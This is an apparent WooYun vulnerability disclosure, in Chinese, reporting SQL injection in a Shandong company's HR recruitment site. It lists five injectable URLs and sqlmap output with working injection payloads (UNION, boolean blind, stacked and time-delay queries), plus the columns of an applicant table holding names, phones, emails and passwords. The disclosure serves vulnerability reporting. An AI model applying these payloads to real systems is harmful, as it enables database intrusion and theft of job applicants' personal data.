当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105969

漏洞标题:山东开创集团SQL注入导致用户敏感信息泄漏

相关厂商:山东开创集团

漏洞作者: lnterface

提交时间:2015-04-08 11:34

修复时间:2015-05-23 11:36

公开时间:2015-05-23 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

  山东开创集团有限公司,国内领先的互联网营销专家与云计算服务提供商,与百度合作多年,为数十万家企业提供网络推广服务。拥有多项自主知识产权和软件著作权产品,依靠自主研发的云计算技术打造的开创云平台,重点面向国内中小企业客户,提供域名注册、云主机、企业邮箱、网站建设、办公软件系统(OA、CRM、HR、ERP)等产品及服务。开创云获得山东省著名品牌称号,并成为行业领导者!
  山东开创集团有限公司是通过工信部和山东省通信管理局认证的业界最大的互联网基础服务提供商之一,中国互联网协会会员、山东互联网协会会员、山东省软件协会会员、山东省电子商务促进会会员、济南市软件协会会员、国家双软认证企业、通过了CMMI3资质认证、ISO9001认证和ISO27001认证、山东信息化十大突出贡献企业、山东十大最具成长力品牌、山东省优秀软件企业。同时,公司还获得市青年文明号、省青年文明号、济南市志愿者服务集体、济南市就业见习基地、五四红旗团支部等称号。

详细说明:

某群看到有人找工作,问起这公司怎样,然后随手检测了一下。我勒个去,这注入太明显了吧
不刷漏洞,注入打包了。
漏洞地址:

http://hr.ctrl.com.cn/JobDeatil.aspx?id=79
http://hr.ctrl.com.cn/Developing.aspx?id=6
http://hr.ctrl.com.cn/JobHelp.aspx?id=1
http://hr.ctrl.com.cn/News.aspx?id=2
http://hr.ctrl.com.cn/newsMore.aspx?id=19
注入参数都是 id


判断了注入直接跑吧:

kc1.jpg


好新的系统啊!

漏洞证明:

kc1.jpg


应聘者的表,姓名、电话、邮箱、密码什么的都有,也算详细的吧

[*] starting at 09:41:32
[09:41:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:41:32] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 7894=7894
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-6640 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(97)+CHAR(108)+CHAR(113)+CHAR(113)+CHAR(72)+CHA
R(122)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(70)+CHAR(108)+CHAR(90)+CHAR(109)+CHAR(102)+CHAR(113)+CHAR(106)+CHAR(
118)+CHAR(122)+CHAR(113),NULL,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=6; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=6 WAITFOR DELAY '0:0:5'--
---
[09:41:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[09:41:33] [INFO] fetching columns for table 'HrMember' in database 'ctrl'
[09:41:33] [WARNING] reflective value(s) found and filtering out
[09:41:33] [INFO] the SQL query used returns 34 entries
[09:41:33] [INFO] retrieved: "addDate","datetime"
[09:41:33] [INFO] retrieved: "brithday","datetime"
[09:41:33] [INFO] retrieved: "comDate","nvarchar"
[09:41:34] [INFO] retrieved: "comEmail","int"
[09:41:34] [INFO] retrieved: "id","int"
[09:41:35] [INFO] retrieved: "isBaby","nvarchar"
[09:41:35] [INFO] retrieved: "isMarryage","nvarchar"
[09:41:36] [INFO] retrieved: "isUser","int"
[09:41:36] [INFO] retrieved: "mEmail","nvarchar"
[09:41:37] [INFO] retrieved: "memberImg","nvarchar"
[09:41:37] [INFO] retrieved: "mhometown","nvarchar"
[09:41:38] [INFO] retrieved: "mHometownCity","nvarchar"
[09:41:38] [INFO] retrieved: "mHometownCityId","nvarchar"
[09:41:39] [INFO] retrieved: "mHometownId","nvarchar"
[09:41:39] [INFO] retrieved: "mName","nvarchar"
[09:41:39] [INFO] retrieved: "mnation","nvarchar"
[09:41:40] [INFO] retrieved: "mType","nvarchar"
[09:41:40] [INFO] retrieved: "mWorkYear","int"
[09:41:41] [INFO] retrieved: "newCity","nvarchar"
[09:41:41] [INFO] retrieved: "newCityID","nvarchar"
[09:41:41] [INFO] retrieved: "newProvince","nvarchar"
[09:41:41] [INFO] retrieved: "newProvinceId","nvarchar"
[09:41:42] [INFO] retrieved: "oldCity","nvarchar"
[09:41:42] [INFO] retrieved: "oldCityId","nvarchar"
[09:41:43] [INFO] retrieved: "oldProvince","nvarchar"
[09:41:43] [INFO] retrieved: "oldProvinceId","nvarchar"
[09:41:43] [INFO] retrieved: "peopleNum","nvarchar"
[09:41:44] [INFO] retrieved: "peopleType","nvarchar"
[09:41:44] [INFO] retrieved: "Phone","nvarchar"
[09:41:44] [INFO] retrieved: "pwd","nvarchar"
[09:41:45] [INFO] retrieved: "sex","int"
[09:41:46] [INFO] retrieved: "StudySchool","nvarchar"
[09:41:46] [INFO] retrieved: "StudyType","nvarchar"
[09:41:47] [INFO] retrieved: "tel","nvarchar"
Database: ctrl
Table: HrMember
[34 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| addDate         | datetime |
| brithday        | datetime |
| comDate         | nvarchar |
| comEmail        | int      |
| id              | int      |
| isBaby          | nvarchar |
| isMarryage      | nvarchar |
| isUser          | int      |
| mEmail          | nvarchar |
| memberImg       | nvarchar |
| mhometown       | nvarchar |
| mHometownCity   | nvarchar |
| mHometownCityId | nvarchar |
| mHometownId     | nvarchar |
| mName           | nvarchar |
| mnation         | nvarchar |
| mType           | nvarchar |
| mWorkYear       | int      |
| newCity         | nvarchar |
| newCityID       | nvarchar |
| newProvince     | nvarchar |
| newProvinceId   | nvarchar |
| oldCity         | nvarchar |
| oldCityId       | nvarchar |
| oldProvince     | nvarchar |
| oldProvinceId   | nvarchar |
| peopleNum       | nvarchar |
| peopleType      | nvarchar |
| Phone           | nvarchar |
| pwd             | nvarchar |
| sex             | int      |
| StudySchool     | nvarchar |
| StudyType       | nvarchar |
| tel             | nvarchar |
+-----------------+----------+


本测试未获取任何用户数据
这么多注入点打包,求高rank

修复方案:

过滤

版权声明:转载请注明来源 lnterface@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝